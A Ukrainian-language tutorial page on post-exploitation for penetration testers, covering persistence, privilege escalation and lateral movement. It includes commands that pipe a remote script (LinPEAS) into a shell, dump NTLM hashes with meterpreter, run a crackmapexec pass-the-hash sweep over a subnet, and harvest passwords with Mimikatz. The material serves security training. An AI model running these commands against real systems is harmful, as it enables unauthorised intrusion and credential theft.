Просунутий
+50 XP

👋 Починай вчитися JavaScript прямо зараз — безкоштовно!

📖

Post-Exploitation

Дії після отримання доступу: закріплення, ескалація привілеїв, lateral movement.

Post-Exploitation: цілі

Після отримання першого доступу (initial access) починається post-exploitation:

  1. Persistence — залишитись після перезавантаження
  2. Privilege Escalation — підвищити права (user → root/SYSTEM)
  3. Lateral Movement — переміститись на інші системи
  4. Data Collection — зібрати цільові дані
  5. Evidence Removal — очистити сліди (опційно, рідко в пентесті)

Privilege Escalation (Linux)

bash
# Поточний користувач і групи
id
whoami

# SUID binaries (виконуються з правами власника)
find / -perm -4000 2>/dev/null

# Sudo дозволи
sudo -l

# Cron jobs (задачі за розкладом)
cat /etc/crontab
ls /etc/cron.*

# Writeable files owned by root
find / -writable -user root 2>/dev/null

# LinPEAS — автоматичний аналізатор
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Privilege Escalation (Windows)

powershell
# Інформація про систему
systeminfo
whoami /priv

# WinPEAS
winpeas.exe

# PowerUp (PowerShell)
Import-Module PowerUp.ps1; Invoke-AllChecks

# AlwaysInstallElevated (MSI з правами SYSTEM)
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer

Lateral Movement

Переміщення по мережі після отримання першого плацдарму.

Pass the Hash (Windows)

bash
# Витягнути хеші NTLM з пам'яті
meterpreter> hashdump
# administrator:500:aad3b435...:8846f7eaee8fb117ad06bdd830b7586c:::

# Використати хеш без злому (PTH)
crackmapexec smb 192.168.56.0/24 -u administrator -H 8846f7eaee8fb117ad06bdd830b7586c

Mimikatz (Windows credential harvesting)

privilege::debug sekurlsa::logonpasswords # паролі з пам'яті sekurlsa::wdigest # plaintext паролі (старі Windows) lsadump::sam # SAM база
Post-exploitation та OPSEC
В реальному пентесті post-exploitation фаза може тривати тижні — задокументуй кожну дію

Коментарі

Увійти або Почати щоб залишити коментар.